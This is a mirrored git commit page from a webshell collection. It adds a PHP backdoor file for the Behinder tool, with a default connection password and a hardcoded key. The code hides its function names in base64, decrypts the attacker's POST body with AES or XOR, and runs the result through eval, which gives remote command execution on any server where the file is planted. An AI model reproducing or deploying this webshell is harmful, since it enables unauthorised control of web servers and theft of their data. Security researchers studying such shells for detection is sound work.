mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create shell2020-12-06.php
password:rebeyond
This commit is contained in:
parent
f875e7b780
commit
c7c6b39833
1 changed files with 26 additions and 0 deletions
26
Behinder/shell2020-12-06.php
Normal file
26
Behinder/shell2020-12-06.php
Normal file
|
@ -0,0 +1,26 @@
|
|||
<?php
|
||||
@error_reporting(0);
|
||||
session_start();
|
||||
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
|
||||
$_SESSION['k']=$key;
|
||||
$f=explode("|",base64_decode("ZmlsZV9nZXRfY29udGVudHN8YmFzZTY0X2RlY29kZXxwaHA6Ly9pbnB1dA=="));
|
||||
$post=["bie"=>$f[0](end($f))];
|
||||
$post=$post["bie"];
|
||||
if(!extension_loaded('openssl'))
|
||||
{
|
||||
$post=$f[1]($post."");
|
||||
|
||||
for($i=0;$i<strlen($post);$i++) {
|
||||
$post[$i] = $post[$i] xor $key[$i+1&15];
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
$post=openssl_decrypt($post, "AES128", $key);
|
||||
}
|
||||
$arr=explode('|',$post);
|
||||
$func=$arr[0];
|
||||
$params=$arr[1];
|
||||
class C{public function __invoke($p) {eval($p."");}}
|
||||
@call_user_func(new C(),$params);
|
||||
?>
|
Loading…
Reference in a new issue